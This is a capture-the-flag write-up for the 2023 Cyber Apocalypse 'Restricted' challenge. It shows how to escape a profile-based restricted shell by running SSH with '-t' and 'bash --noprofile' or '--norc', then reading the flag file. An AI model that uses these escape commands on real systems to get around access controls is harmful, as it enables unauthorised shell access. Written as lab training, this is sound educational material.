2023 Cyber Apocalypse: Restricted

#htb #ctf #misc #ssh #privilege-escalation #shell-escape

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryMisc
ChallengeRestricted

Summary

This challenge involves connecting to a restricted SSH environment with limited command capabilities. The restriction is enforced through a custom bash profile that whitelists only certain commands. By bypassing the profile using SSH options, we can execute arbitrary bash commands and access the flag.

Analysis

The challenge setup includes:

  • SSH server with restricted user account
  • Custom .bashrc or .bash_profile that limits available commands
  • Flag stored in a protected directory

Vulnerability: SSH allows specifying a remote command that bypasses the interactive shell profile. Additionally, the -t flag forces pseudo-terminal allocation while allowing command execution.

Solution approach:

Terminal window
ssh -t restricted@target -p port "bash --noprofile"

The flags:

  • -t: Force pseudo-terminal allocation (overrides NoTTY restrictions)
  • bash --noprofile: Runs bash without loading profile restrictions
  • bash --norc: Runs bash without loading rc files

Solution

Step 1: Connect with SSH

Terminal window
ssh -X restricted@159.65.94.38 -p 32573 -t "bash --noprofile"

Step 2: Navigate to flag location

Terminal window
cd flag_8dpsy

Step 3: Read the flag

Terminal window
cat flag_8dpsy

Alternative approach using SSH command execution:

Terminal window
ssh -X restricted@159.65.94.38 -p 32573 -t "bash --norc"

Why this works:

  • --noprofile prevents loading /etc/profile, ~/.bash_profile, ~/.bash_login, ~/.profile
  • --norc prevents loading ~/.bashrc
  • -t forces a pseudo-terminal, bypassing TTY checks
  • This gives full shell access despite profile restrictions

Key Takeaways

  • Bash profile files (.bashrc, .bash_profile) enforce restrictions
  • SSH command execution can bypass interactive shell restrictions
  • The --noprofile and --norc flags disable profile loading
  • TTY allocation can be forced with -t flag
  • Restricted shells can often be escaped by understanding how they work
  • Security through shell restrictions is weak without proper system-level controls
  • Understanding shell startup sequences is crucial for escape techniques